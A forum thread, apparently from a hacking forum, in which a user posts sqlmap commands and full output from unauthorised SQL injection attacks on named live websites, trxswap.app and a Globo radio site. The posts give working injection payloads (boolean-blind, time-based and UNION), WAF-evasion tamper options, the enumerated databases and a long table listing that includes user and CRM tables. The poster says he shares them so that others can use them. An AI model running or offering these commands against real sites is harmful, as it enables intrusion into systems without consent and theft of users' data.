SQL injections and other vulnerabilities that I find and have no use with it

MrDark · 07.09.2025

Like my posts if it helped you and you want injections to keep coming.

Recently grabbing and pentesting targets from bitcointalk.org ( https://bitcointalk.org/index.php?topic=5529510.0 )

sqlmap -u "https://trxswap.app/statusById.php?orderId=aec112a8-bba4-4ba3-95a5-2f1b882088a7" --batch --level=3 --risk=2 --dbs

Код:

       __H__
 ___ ___[(]_____ ___ ___  {1.9.8#pip}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:45:34 /2025-09-06/

[16:45:34] [INFO] testing connection to the target URL
[16:45:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:45:37] [INFO] testing if the target URL content is stable
[16:45:38] [INFO] target URL content is stable
[16:45:38] [INFO] testing if GET parameter 'orderId' is dynamic
[16:45:39] [INFO] GET parameter 'orderId' appears to be dynamic
[16:45:40] [WARNING] heuristic (basic) test shows that GET parameter 'orderId' might not be injectable
[16:45:40] [INFO] testing for SQL injection on GET parameter 'orderId'
[16:45:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:45:44] [INFO] GET parameter 'orderId' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:46:01] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[16:46:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:46:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:46:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:46:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:46:04] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:46:05] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:46:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:46:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:46:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:46:08] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:46:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:46:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:46:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:46:12] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:46:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[16:46:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:46:15] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:46:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:46:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:46:16] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[16:46:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:46:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:46:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:46:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:46:16] [INFO] testing 'Generic inline queries'
[16:46:16] [INFO] testing 'MySQL inline queries'
[16:46:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:46:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[16:46:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[16:46:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[16:46:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[16:46:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[16:46:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:46:35] [INFO] GET parameter 'orderId' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[16:46:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:46:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:46:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:46:43] [INFO] target URL appears to have 20 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[16:48:37] [INFO] GET parameter 'orderId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'orderId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 187 HTTP(s) requests:
---
Parameter: orderId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: orderId=aec112a8-bba4-4ba3-95a5-2f1b882088a7' AND 6522=6522-- fkMr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: orderId=aec112a8-bba4-4ba3-95a5-2f1b882088a7' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))kKJE)-- isNh

    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: orderId=-4134' UNION ALL SELECT 53,53,53,53,CONCAT(0x71786b6b71,0x4965774170786b6f706a7865785878764773714b62545a424d436b7a73495a5561494c7551447368,0x7176706a71),53,53,53,53,53,53,53,53,53,53,53,53,53,53,53-- -
---
[16:48:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.24.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:48:38] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys
[*] trxswap

CCod · 07.09.2025

а сюда слил зачем?

MrDark · 07.09.2025

CCod сказал(а):

а сюда слил зачем?

I don't have any use of it, others might, that's why.

looonely_creature · 08.09.2025

no useful data in there , but thanks for sharing .
it might not be the main DB

MrDark · 11.09.2025

Код:

(myenv) root@E02S29:~# sqlmap -u "https://bhfm.globo.com/evento.php?area=BHEVI&eventoId=3464" --level=3 --risk=2 --batch --random-agent --tamper=space2comment --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:47:52 /2025-09-11/

[06:47:53] [INFO] loading tamper module 'space2comment'
[06:47:54] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062908 Firefox/3.0 (Debian-3.0~rc2-2)' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[06:47:58] [INFO] resuming back-end DBMS 'mysql'
[06:47:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=uvscbihk8tj...2s0nec2mt7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eventoId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=BHEVI&eventoId=3464 AND 6233=6233

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: area=BHEVI&eventoId=3464 AND (SELECT 2984 FROM (SELECT(SLEEP(5)))MVPu)
---
[06:48:01] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:48:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[06:48:01] [INFO] fetching database names
[06:48:01] [INFO] fetching number of databases
[06:48:02] [INFO] resumed: 2
[06:48:02] [INFO] resumed: information_schema
[06:48:03] [INFO] resumed: globoradio
available databases [2]:
[*] globoradio
[*] information_schema

[06:48:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/bhfm.globo.com'

[*] ending @ 06:48:03 /2025-09-11/

(myenv) root@E02S29:~# sqlmap -u "https://bhfm.globo.com/evento.php?area=BHEVI&eventoId=3464" --level=3 --risk=2 --batch --random-agent --tamper=space2comment -D globoradio --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:48:30 /2025-09-11/

[06:48:30] [INFO] loading tamper module 'space2comment'
[06:48:30] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Windows NT 5.0; en-US; rv:1.9b4) Gecko/2008030318 Firefox/3.0b4' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[06:48:30] [INFO] resuming back-end DBMS 'mysql'
[06:48:30] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=tg9d0c36q07...8l9f1m3mk1'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eventoId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=BHEVI&eventoId=3464 AND 6233=6233

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: area=BHEVI&eventoId=3464 AND (SELECT 2984 FROM (SELECT(SLEEP(5)))MVPu)
---
[06:48:32] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:48:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[06:48:32] [INFO] fetching tables for database: 'globoradio'
[06:48:32] [INFO] fetching number of tables for database 'globoradio'
[06:48:34] [INFO] resumed: 337
[06:48:34] [INFO] resumed: cbn_areas
[06:48:34] [INFO] resumed: cbn_destaques
[06:48:35] [INFO] resumed: cbn_email
[06:48:35] [INFO] resumed: cbn_email_bkp
[06:48:35] [INFO] resumed: cbn_grupos
[06:48:35] [INFO] resumed: cbn_imagens
[06:48:35] [INFO] resumed: cbn_links
[06:48:35] [INFO] resumed: cbn_linksmanchete
[06:48:35] [INFO] resumed: cbn_manchete
[06:48:35] [INFO] resumed: cbn_noticias
[06:48:35] [INFO] resumed: cbn_outrasn_links
[06:48:35] [INFO] resumed: cbn_outrasnoticias
[06:48:35] [INFO] resumed: cbn_outrosc_links
[06:48:35] [INFO] resumed: cbn_outroscomen
[06:48:35] [INFO] resumed: cbn_tipo_links
[06:48:35] [INFO] resumed: cbn_usuario
[06:48:35] [INFO] resumed: es_area
[06:48:35] [INFO] resumed: es_area_curso
[06:48:35] [INFO] resumed: es_area_estado
[06:48:35] [INFO] resumed: es_area_localdata
[06:48:35] [INFO] resumed: es_curso
[06:48:35] [INFO] resumed: es_estado
[06:48:35] [INFO] resumed: es_inscricao
[06:48:35] [INFO] resumed: es_instituicao
[06:48:35] [INFO] resumed: es_local
[06:48:35] [INFO] resumed: es_localdata
[06:48:35] [INFO] resumed: mkt_nota
[06:48:35] [INFO] resumed: mkt_pagina
[06:48:35] [INFO] resumed: pela_album
[06:48:35] [INFO] resumed: pela_bairro
[06:48:35] [INFO] resumed: pela_campeonato
[06:48:35] [INFO] resumed: pela_campo_futebol
[06:48:35] [INFO] resumed: pela_cidade
[06:48:35] [INFO] resumed: pela_comentario_campo
[06:48:35] [INFO] resumed: pela_comentario_feed
[06:48:35] [INFO] resumed: pela_configuracoes
[06:48:35] [INFO] resumed: pela_convite_evento
[06:48:35] [INFO] resumed: pela_convite_time
[06:48:35] [INFO] resumed: pela_convite_usuario
[06:48:35] [INFO] resumed: pela_estado
[06:48:35] [INFO] resumed: pela_evento
[06:48:35] [INFO] resumed: pela_feeds_time
[06:48:35] [INFO] resumed: pela_foto
[06:48:35] [INFO] resumed: pela_foto_campo
[06:48:35] [INFO] resumed: pela_horarios_campo
[06:48:35] [INFO] resumed: pela_jogo
[06:48:35] [INFO] resumed: pela_mensagem
[06:48:35] [INFO] resumed: pela_time
[06:48:35] [INFO] resumed: pela_time_campeonato
[06:48:35] [INFO] resumed: pela_time_jogo
[06:48:35] [INFO] resumed: pela_trofeu
[06:48:35] [INFO] resumed: pela_trofeu_atribuido
[06:48:35] [INFO] resumed: pela_usuario
[06:48:35] [INFO] resumed: pela_usuario_campo
[06:48:35] [INFO] resumed: pela_usuario_time
[06:48:35] [INFO] resumed: pela_usuario_time_jogo
[06:48:35] [INFO] resumed: pela_video
[06:48:35] [INFO] resumed: pgr_tb_pergunta
[06:48:35] [INFO] resumed: pgr_tb_pergunta_resposta
[06:48:35] [INFO] resumed: pgr_tb_voto
[06:48:35] [INFO] resumed: pgr_tb_voto_resposta
[06:48:35] [INFO] resumed: tb_adm_grupo
[06:48:35] [INFO] resumed: tb_adm_log
[06:48:35] [INFO] resumed: tb_adm_modulo
[06:48:35] [INFO] resumed: tb_adm_modulo_grupo
[06:48:35] [INFO] resumed: tb_adm_operacao
[06:48:35] [INFO] resumed: tb_adm_pagina
[06:48:35] [INFO] resumed: tb_adm_pagina_portlet
[06:48:35] [INFO] resumed: tb_adm_parametro
[06:48:35] [INFO] resumed: tb_adm_portlet
[06:48:35] [INFO] resumed: tb_adm_portlet_pagina
[06:48:35] [INFO] resumed: tb_adm_usuario
[06:48:35] [INFO] resumed: tb_adm_usuario_grupo
[06:48:35] [INFO] resumed: tb_cbn_categoria
[06:48:35] [INFO] resumed: tb_cbn_credito_foto
[06:48:35] [INFO] resumed: tb_cbn_foto_galeria
[06:48:35] [INFO] resumed: tb_cbn_galeria
[06:48:35] [INFO] resumed: tb_cbn_galeria_categoria
[06:48:35] [INFO] resumed: tb_cbn_podcast_download
[06:48:35] [INFO] resumed: tb_cbn_podcast_download_spot_dia
[06:48:35] [INFO] resumed: tb_cbn_spot_categoria_cbn
[06:48:35] [INFO] resumed: tb_cbn_video
[06:48:35] [INFO] resumed: tb_cbn_video_categoria
[06:48:35] [INFO] resumed: tb_cbn_video_galeria
[06:48:35] [INFO] resumed: tb_concursos
[06:48:35] [INFO] resumed: tb_concursos_comentarios
[06:48:35] [INFO] resumed: tb_concursos_grupos
[06:48:35] [INFO] resumed: tb_concursos_participacao
[06:48:35] [INFO] resumed: tb_concursos_pessoal
[06:48:35] [INFO] resumed: tb_concursos_pessoal_complemento
[06:48:35] [INFO] resumed: tb_crm_endereco
[06:48:35] [INFO] resumed: tb_crm_endereco_radio
[06:48:35] [INFO] resumed: tb_crm_usuario
[06:48:35] [INFO] resumed: tb_crm_usuario_celular_confirmado
[06:48:35] [INFO] resumed: tb_glb_mlg_transacao
[06:48:35] [INFO] resumed: tb_pub_area
[06:48:35] [INFO] resumed: tb_pub_area_link
[06:48:35] [INFO] resumed: tb_pub_area_metadado
[06:48:35] [INFO] resumed: tb_pub_area_time_rg
[06:48:35] [INFO] resumed: tb_pub_audio
[06:48:35] [INFO] resumed: tb_pub_bannerclique
[06:48:35] [INFO] resumed: tb_pub_campanha
[06:48:35] [INFO] resumed: tb_pub_campanha_podcast
[06:48:35] [INFO] resumed: tb_pub_campanha_spot
[06:48:35] [INFO] resumed: tb_pub_cbn_categoria_metadado
[06:48:35] [INFO] resumed: tb_pub_cbn_grade_programacao
[06:48:35] [INFO] resumed: tb_pub_cbn_par_parceiro
[06:48:35] [INFO] resumed: tb_pub_cbn_par_parceiro_blog
[06:48:35] [INFO] resumed: tb_pub_cbn_par_parceiro_categoria
[06:48:35] [INFO] resumed: tb_pub_cbn_par_parceiro_twitter
[06:48:35] [INFO] resumed: tb_pub_cliente
[06:48:35] [INFO] resumed: tb_pub_colaboracao
[06:48:35] [INFO] resumed: tb_pub_colaboracao_audio
[06:48:35] [INFO] resumed: tb_pub_colaboracao_foto_ext
[06:48:35] [INFO] resumed: tb_pub_colaboracao_video
[06:48:35] [INFO] resumed: tb_pub_com_spot
[06:48:35] [INFO] resumed: tb_pub_com_spot_area
[06:48:35] [INFO] resumed: tb_pub_comentario
[06:48:35] [INFO] resumed: tb_pub_comentario_denuncia
[06:48:35] [INFO] resumed: tb_pub_destaques_distribuicao
[06:48:35] [INFO] resumed: tb_pub_email_black_list
[06:48:35] [INFO] resumed: tb_pub_estudio_aba
[06:48:35] [INFO] resumed: tb_pub_evento
[06:48:35] [INFO] resumed: tb_pub_flash
[06:48:35] [INFO] resumed: tb_pub_foto
[06:48:35] [INFO] resumed: tb_pub_foto_externa
[06:48:35] [INFO] resumed: tb_pub_funcao
[06:48:35] [INFO] resumed: tb_pub_fut_campeonato
[06:48:35] [INFO] resumed: tb_pub_fut_campeonato_fase
[06:48:35] [INFO] resumed: tb_pub_fut_campeonato_rg
[06:48:35] [INFO] resumed: tb_pub_fut_confronto
[06:48:35] [INFO] resumed: tb_pub_fut_confronto_rg
[06:48:35] [INFO] resumed: tb_pub_fut_confronto_rg_comentarista
[06:48:35] [INFO] resumed: tb_pub_fut_confronto_rg_locutor
[06:48:35] [INFO] resumed: tb_pub_fut_confronto_rg_materia
[06:48:35] [INFO] resumed: tb_pub_fut_confronto_rg_praca
[06:48:35] [INFO] resumed: tb_pub_fut_fase
[06:48:35] [INFO] resumed: tb_pub_fut_gol_confronto_rg
[06:48:35] [INFO] resumed: tb_pub_fut_grupo
[06:48:35] [INFO] resumed: tb_pub_fut_grupo_time
[06:48:35] [INFO] resumed: tb_pub_fut_tabela_jogo
[06:48:35] [INFO] resumed: tb_pub_fut_time
[06:48:35] [INFO] resumed: tb_pub_fut_time_confronto
[06:48:35] [INFO] resumed: tb_pub_fut_time_confronto_rg
[06:48:35] [INFO] resumed: tb_pub_fut_time_rg
[06:48:35] [INFO] resumed: tb_pub_futebol_praca
[06:48:35] [INFO] resumed: tb_pub_futebol_praca_rg
[06:48:35] [INFO] resumed: tb_pub_gen_agenda_eventos
[06:48:35] [INFO] resumed: tb_pub_gen_album
[06:48:35] [INFO] resumed: tb_pub_gen_album_figurinha
[06:48:35] [INFO] resumed: tb_pub_gen_album_figurinha_pagina
[06:48:35] [INFO] resumed: tb_pub_gen_album_figurinha_usuario
[06:48:35] [INFO] resumed: tb_pub_gen_album_midia_grupo
[06:48:35] [INFO] resumed: tb_pub_gen_aovivo
[06:48:35] [INFO] resumed: tb_pub_gen_aovivo_playlist
[06:48:35] [INFO] resumed: tb_pub_gen_aovivo_xref
[06:48:35] [INFO] resumed: tb_pub_gen_artista
[06:48:35] [INFO] resumed: tb_pub_gen_artista_galeria_foto
[06:48:35] [INFO] resumed: tb_pub_gen_artista_midia_grupo
[06:48:35] [INFO] resumed: tb_pub_gen_artista_musica
[06:48:35] [INFO] resumed: tb_pub_gen_artista_playlist
[06:48:35] [INFO] resumed: tb_pub_gen_artista_radio
[06:48:35] [INFO] resumed: tb_pub_gen_artista_radio_galeria_foto
[06:48:35] [INFO] resumed: tb_pub_gen_artista_radio_link
[06:48:35] [INFO] resumed: tb_pub_gen_artista_radio_materia
[06:48:35] [INFO] resumed: tb_pub_gen_audio_colaboracao
[06:48:35] [INFO] resumed: tb_pub_gen_blog
[06:48:35] [INFO] resumed: tb_pub_gen_blog_area
[06:48:35] [INFO] resumed: tb_pub_gen_cadunsocial
[06:48:35] [INFO] resumed: tb_pub_gen_categoria_midia
[06:48:35] [INFO] resumed: tb_pub_gen_categoria_midia_grupo
[06:48:35] [INFO] resumed: tb_pub_gen_categoria_musica
[06:48:35] [INFO] resumed: tb_pub_gen_colaboracao
[06:48:35] [INFO] resumed: tb_pub_gen_colaboracao_audio_colaboracao
[06:48:35] [INFO] resumed: tb_pub_gen_colaboracao_foto_colaboracao
[06:48:35] [INFO] resumed: tb_pub_gen_colaboracao_video_colaboracao
[06:48:35] [INFO] resumed: tb_pub_gen_comentario
[06:48:35] [INFO] resumed: tb_pub_gen_comentario_denuncia
[06:48:35] [INFO] resumed: tb_pub_gen_compositor
[06:48:35] [INFO] resumed: tb_pub_gen_compositor_midia_grupo
[06:48:35] [INFO] resumed: tb_pub_gen_credito
[06:48:35] [INFO] resumed: tb_pub_gen_credito_foto
[06:48:35] [INFO] resumed: tb_pub_gen_enquete
[06:48:35] [INFO] resumed: tb_pub_gen_enquete_campo
[06:48:35] [INFO] resumed: tb_pub_gen_enquete_resultado
[06:48:35] [INFO] resumed: tb_pub_gen_equipe
[06:48:35] [INFO] resumed: tb_pub_gen_equipe_profissional
[06:48:35] [INFO] resumed: tb_pub_gen_especial_publicitario
[06:48:35] [INFO] resumed: tb_pub_gen_especial_publicitario_link
[06:48:35] [INFO] resumed: tb_pub_gen_estudio
[06:48:35] [INFO] resumed: tb_pub_gen_filtro_acao
[06:48:35] [INFO] resumed: tb_pub_gen_filtro_palavra
[06:48:35] [INFO] resumed: tb_pub_gen_foto
[06:48:35] [INFO] resumed: tb_pub_gen_foto_colaboracao
[06:48:35] [INFO] resumed: tb_pub_gen_foto_tamanho
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_album_figurinha
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_foto
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_foto_area
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_grupo_album_figurinha
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_grupo_foto
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_imagem
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_imagem_area
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_imagem_imagem
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_midia
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_midia_area
[06:48:35] [INFO] resumed: tb_pub_gen_galeria_midia_grupo_midia
[06:48:35] [INFO] resumed: tb_pub_gen_grade_programacao
[06:48:35] [INFO] resumed: tb_pub_gen_gravadora
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_foto
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_foto_figurinha
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_imagem
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_midia
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_midia_area
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_midia_letra
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_midia_opiniao
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_midia_opiniao_dados
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_midia_opiniao_origem
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_profissional
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_profissional_profissional
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_tamanho_foto
[06:48:35] [INFO] resumed: tb_pub_gen_grupo_tamanho_foto_tamanho
[06:48:35] [INFO] resumed: tb_pub_gen_html
[06:48:35] [INFO] resumed: tb_pub_gen_imagem
[06:48:35] [INFO] resumed: tb_pub_gen_instancia
[06:48:35] [INFO] resumed: tb_pub_gen_instancia_portlet
[06:48:35] [INFO] resumed: tb_pub_gen_link_artista
[06:48:35] [INFO] resumed: tb_pub_gen_link_profissional
[06:48:35] [INFO] resumed: tb_pub_gen_log_grupo_midia
[06:48:35] [INFO] resumed: tb_pub_gen_log_midia
[06:48:35] [INFO] resumed: tb_pub_gen_mais_acessados
[06:48:35] [INFO] resumed: tb_pub_gen_materia
[06:48:35] [INFO] resumed: tb_pub_gen_materia_area
[06:48:35] [INFO] resumed: tb_pub_gen_materia_grupo_midia
[06:48:35] [INFO] resumed: tb_pub_gen_materia_playlist
[06:48:35] [INFO] resumed: tb_pub_gen_materia_relacionada
[06:48:35] [INFO] resumed: tb_pub_gen_materia_time_rg
[06:48:35] [INFO] resumed: tb_pub_gen_midia
[06:48:35] [INFO] resumed: tb_pub_gen_midia_foto
[06:48:35] [INFO] resumed: tb_pub_gen_midia_gravadora
[06:48:35] [INFO] resumed: tb_pub_gen_midia_grupo
[06:48:35] [INFO] resumed: tb_pub_gen_midia_meta
[06:48:35] [INFO] resumed: tb_pub_gen_musica
[06:48:35] [INFO] resumed: tb_pub_gen_musica_album
[06:48:35] [INFO] resumed: tb_pub_gen_musica_radio
[06:48:35] [INFO] resumed: tb_pub_gen_path_fisico
[06:48:35] [INFO] resumed: tb_pub_gen_player
[06:48:35] [INFO] resumed: tb_pub_gen_player_tipo
[06:48:35] [INFO] resumed: tb_pub_gen_playlist
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_aovivo
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_area
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_area2
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_categoria_midia
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_favorita
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_grupo_midia
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_ouvida
[06:48:35] [INFO] resumed: tb_pub_gen_playlist_xref
[06:48:35] [INFO] resumed: tb_pub_gen_profissional
[06:48:35] [INFO] resumed: tb_pub_gen_profissional_area
[06:48:35] [INFO] resumed: tb_pub_gen_profissional_funcao
[06:48:35] [INFO] resumed: tb_pub_gen_profissional_materia
[06:48:35] [INFO] resumed: tb_pub_gen_profissional_programa
[06:48:35] [INFO] resumed: tb_pub_gen_programa_profissional
[06:48:35] [INFO] resumed: tb_pub_gen_pulsar_opiniao
[06:48:35] [INFO] resumed: tb_pub_gen_quadro
[06:48:35] [INFO] resumed: tb_pub_gen_quadro_profissional
[06:48:35] [INFO] resumed: tb_pub_gen_quiz
[06:48:35] [INFO] resumed: tb_pub_gen_quiz_controle_usuario
[06:48:35] [INFO] resumed: tb_pub_gen_quiz_pergunta
[06:48:35] [INFO] resumed: tb_pub_gen_quiz_pergunta_opcao
[06:48:36] [INFO] resumed: tb_pub_gen_quiz_resposta_usuario
[06:48:36] [INFO] resumed: tb_pub_gen_skin
[06:48:36] [INFO] resumed: tb_pub_gen_tamanho_imagem
[06:48:36] [INFO] resumed: tb_pub_gen_ticker
[06:48:36] [INFO] resumed: tb_pub_gen_tipo_midia
[06:48:36] [INFO] resumed: tb_pub_gen_video_colaboracao
[06:48:36] [INFO] resumed: tb_pub_grade_programacao
[06:48:36] [INFO] resumed: tb_pub_instancia
[06:48:36] [INFO] resumed: tb_pub_intervalo
[06:48:36] [INFO] resumed: tb_pub_materia
[06:48:36] [INFO] resumed: tb_pub_materia_area
[06:48:36] [INFO] resumed: tb_pub_materia_area_destaque
[06:48:36] [INFO] resumed: tb_pub_materia_foto
[06:48:36] [INFO] resumed: tb_pub_materia_link
[06:48:36] [INFO] resumed: tb_pub_materia_relacionada
[06:48:36] [INFO] resumed: tb_pub_materia_tag
[06:48:36] [INFO] resumed: tb_pub_metadado
[06:48:36] [INFO] resumed: tb_pub_modulo
[06:48:36] [INFO] resumed: tb_pub_newsletter
[06:48:36] [INFO] resumed: tb_pub_newsletter_materia
[06:48:36] [INFO] resumed: tb_pub_newsletter_usuario_erro
[06:48:36] [INFO] resumed: tb_pub_par_parceiro
[06:48:36] [INFO] resumed: tb_pub_par_parceiro_area
[06:48:36] [INFO] resumed: tb_pub_par_parceiro_area_galeria
[06:48:36] [INFO] resumed: tb_pub_par_parceiro_area_playlist
[06:48:36] [INFO] resumed: tb_pub_par_parceiro_profissional
[06:48:36] [INFO] resumed: tb_pub_par_parceiro_programa
[06:48:36] [INFO] resumed: tb_pub_par_podcast
[06:48:36] [INFO] resumed: tb_pub_par_podcast_area
[06:48:36] [INFO] resumed: tb_pub_pchave
[06:48:36] [INFO] resumed: tb_pub_pchave_classificacao
[06:48:36] [INFO] resumed: tb_pub_pchave_identidade
[06:48:36] [INFO] resumed: tb_pub_podcast
[06:48:36] [INFO] resumed: tb_pub_podcast_area
[06:48:36] [INFO] resumed: tb_pub_premio
[06:48:36] [INFO] resumed: tb_pub_premio_area
[06:48:36] [INFO] resumed: tb_pub_premio_materia
